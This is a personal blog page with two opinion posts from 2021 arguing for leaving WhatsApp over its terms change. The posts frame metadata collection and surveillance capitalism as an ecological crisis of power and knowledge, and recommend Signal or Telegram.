AN ECOLOGICAL CRISIS

Why It Is Urgent to Take Action 

We got where we are today because the unprecedented nature of these developments has obfuscated what was really going on (see Zuboff for more on this). In 2021 though, it is hard to ignore that we have reached a point where we can’t afford to be complacent

In 1964, environmentalist Rachel Carson wrote Silent Spring, a compelling call for the world to wake up to the large-scale slaughtering of our environment through the commodification of nature by large corporations with unmatched lobbying power. Today, we are doing to human experience what we started doing to nature 60 years ago

Reconfigurations of Power

First, it is an ecological crisis in the distribution of power. The digital developments of the past 20 years have created massive asymmetries of knowledge. In other words, Google and Facebook know heaps about us but we know very little about them. The algorithms that orchestrate the online life of several billion people across the planet are considered proprietary trade secrets. These massive asymmetries of knowledge lead to massive asymmetries of power

This is compounded by the void in the legal framework surrounding these issues. An army of in-house lawyers unilaterally controls our contractual relationship with some platforms which in many ways have become public spaces. The only alternative to full acceptance is not to use the service. And a second army of “communication experts” and lobbyists carefully craft the official narrative (the definition of privacy is only one example). 

Crisis of the Ecology of Knowledge

But there is another more insidious and less talked about implication. The commodification of users is leading to a major epistemological catastrophe. The reductionist approach to human experience (i.e., to quantify purely qualitative aspects of our lives, and discard what cannot be quantified) is corrupting what we know, and how we know what we know. It is an ecological crisis of knowledge of the sort only seen once in a millennium (more about that in another post). 

MISCONCEPTIONS

Everyone on the Web Collects Data, so Why Bother?

Now, coming back to where we started, I hope I have given some avenues of reflection for why quitting WhatsApp may not be such a bad idea after all. However, I want to address one concern that I heard many time in the past couple of months. 

Some people told me: “if I move to Telegram or Signal, they will also collect my data, so what’s the point?” That’s a very valid question. While it is true that data collection is widespread online (we all heard about the cooking apps collecting your device ID and geolocation), everything is not created equal so we need to use our power of discrimination.

First, Telegram and Signal collect much less metadata than WhatsApp (or Facebook Messenger). In fact, Signal only collects your phone number. You can easily check this. In fact, just like you brush your teeth in the morning, it is a good habit to check what metadata the apps you use get from you. But that’s not all. 

Exercise Our “WE” Muscle

Second, we need to exercise our “we” muscle instead of solely relying on our “I” muscle. As I mentioned above, this is an ecological issue. Self-centred thinking is not a luxury we can afford anymore. If social media have taught us anything, it is that we are intricately interconnected and that the decisions we make individually have global consequences. This is true for the environment; this is also true for the digital environment. 

Be selective in whose business you patronise, because as you do, you are participating in creating the world that we will leave to the next generations. In other words, do not underestimate the positive ripple effects from an individual decision to use an equivalent app outside of the Facebook domain (and that applies to Google as well by the way). As I said in my previous post, if you leave, some people in your network will also leave. The network effect works in favour of platform monopoly but it can also work against it. 

Final Word: Personal Convenience Is Not a Judicious Ground for Action

One last word. Some will decide to remain on WhatsApp not because they trust Facebook but simply for convenience. This is one option. Social platforms are built for convenience (in design parlance it is called “user experience” or UX for short), because they know that convenience drives users’ lethargy. To follow this argument, it is also more convenient to throw garbage through your car window, release harmful chemicals in rivers rather than in purifying facilities, and throw plastic bottles in the ocean rather than in recycling plants. Personal convenience is not always the most judicious ground for action. 

RESOURCES

I am starting a Datafication & Technology blog to keep writing about these issues (www.datafication.space). Post, comment or send me questions (datafication.space AT protonmail.com) on topics you would like to see treated.

GENERAL RESSOURCES

SPECIFIC TOPICS

  • To read more on the historical developments, the mechanisms and ideological premises of Surveillance Capitalism, check “The Age of Surveillance Capitalism” by Shoshana Zuboff, Professor Emerita at Harvard Business School who has researched technology since the 1970s. The book made such a noise since it came out that it now has a wikipedia entry (https://en.wikipedia.org/wiki/The_Age_of_Surveillance_Capitalism). Zuboff gave a string of interviews, and you can also easily find those online. 

Why I am quitting WhatsApp – Part I (13 January 2021)

For the past 5 years, I have been doing a PhD research on large social platforms. I want to share a few thoughts on why I am quitting WhatsApp before February 8th 2021. 

As you probably heard by now, WhatsApp is changing its Terms & Conditions as of 8th of February, 2021. Furthermore, as is customary with Facebook companies, the move is unilateral and if users do not accept the new terms, they will lose access to their account. There are two things you want to be very clear about when you make your decision to remain on the platform. What “data” and “privacy” mean and why WhatsApp is making the change. 

WHAT DO DATA & PRIVACY MEAN?

It is not the first assault on our privacy in the race to control the use of our data. WhatsApp has been sharing information with Facebook, its parent company, for a while. However, this change opens the door for major, more intrusive and more unilateral changes that violate the privacy and the dignity of their users. We all know about the privacy issues that come with social platforms. We all know that FB collects our data. But the real questions are: what is this data we are talking about? FB claims that “privacy” is built into their DNA, but how do they define privacy?

Over the years, FB has been very careful to maintain ambiguity about this and have adopted a very narrow definition. They equate data with CONTENT, i.e. WHAT we say in the messages we exchange, and equate privacy with not having access to that content. They say that WhatsApp supports point to point encryption, and even WhatsApp does not have access to the content of what we write, therefore, they respect our privacy. 

This is a FALLACY. The data that FB and WhatsApp want is not the content (what we write), but data on our behaviours when we are on their platform, like where we are, who we contact, how long we stay on the platform, who do we message most, at what time, who is in our network etc… This data is called “breadcrumbs”, because it is a kind of side effect that happens when we use their main service. But it is the most valuable data because, when it is aggregated and analysed by super computers (what is called Big Data), it gives Facebook very deep insights into you, who you are, your personality, what presses your buttons, your body, your health, your mental state, your wishes and many things that you would not want other people to know about you, and rightfully so. 

I often hear people say that “Facebook sells our data”, but Facebook says they don’t and it is true! They do not sell our data, they sell something much more valuable than our raw data. They use our data as raw material to create computer-ready products that they sell on their platform not only to advertisers but to whoever wants to buy them (governments, extremists, third parties trying to influence elections… you name it). In other words, we, the users, have become not the product, but the raw material, the cheap commodity. We are called “users” but a better name should the “USED”. (If you want to know more about this, read Shoshana Zuboff’s “The Age of Surveillance Capitalism”, a powerful eye opener!)

WHY THE CHANGE?

So why is WhatsApp making the changes now? 

First, because Facebook wants to monetise WhatsApp. Think about it as an expensive piece of real estate with just a small house on it. Even if the house is quite nice, that piece of land is not optimised. Facebook wants to create a universe that is so all-encompassing that users never need to leave it. It wants to be the “WeChat of the West”, a place where ultimately, you will be able to socialise, communicate with your friends, share moments, workout, buy stuff, send money, follow your favourite brands or celebrities, fall in love, manage your health and bank accounts or credit cards etc. In other words, Facebook wants you to live your life through Facebook. Why? Well data of course!

Second, because Facebook wants to integrate WhatsApp so deeply into the Facebook family that it will soon be impossible (or very difficult) for regulators to break them down. Think about it as baking a cake. Once the flour and the eggs and the sugar have become the cake, you can’t get the eggs back. Facebook is under scrutiny from governments in several countries. The EU already set up the GDPR, a regulation on data protection and privacy, in 2016. In the US, there is a strong bi-partisan concern and Facebook is being investigated for abuse of dominance and anti competitive conduct, with the idea of possibly breaking it up. But as I said, once the cake is baked, it is really tricky to get the eggs back… 

SO WHAT SHALL I DO?

In the past week or so, many people have downloaded Telegram and Signal, two WhatsApp-like apps that provide instant messaging services. But I also hear a lot of people say they will stay on WhatsApp even though they downloaded the new apps. 

“I will stay on WhatsApp for now but I will quit later”. This is exactly what Facebook is counting on, because they know one fact about human psychology: that we are essentially creatures of habits, and once we are used to doing something in a certain way, it is going to take a lot of effort to change it (ask smokers how easy they find it to stop smoking). Right now, there is a knee jerk reaction, we download Signal or Telegram and it makes us feel better and safer. But in one month time, when another breaking news occupies our (limited) mental space, all will go back to the way we have always done it, i.e. “I’ll WhatsApp you!” 

“I can’t quit WhatsApp, all my friend/clients are there”. True, with over 2 billion users, your friends, family, clients and their cats and dogs are probably all on WhatsApp. But the argument above is the snake biting its own tail. If people leave WhatsApp, people will leave WhatsApp. I am quite certain that you would be surprised if you checked how many people around you actually do have an account on another major messaging app, or are ready to download it and make the switch! (I certainly was). 

So for all those reasons, it’s Farewell WhatsApp for me. And I am looking forward to life without Facebook with curiosity and anticipation! 

Newer posts »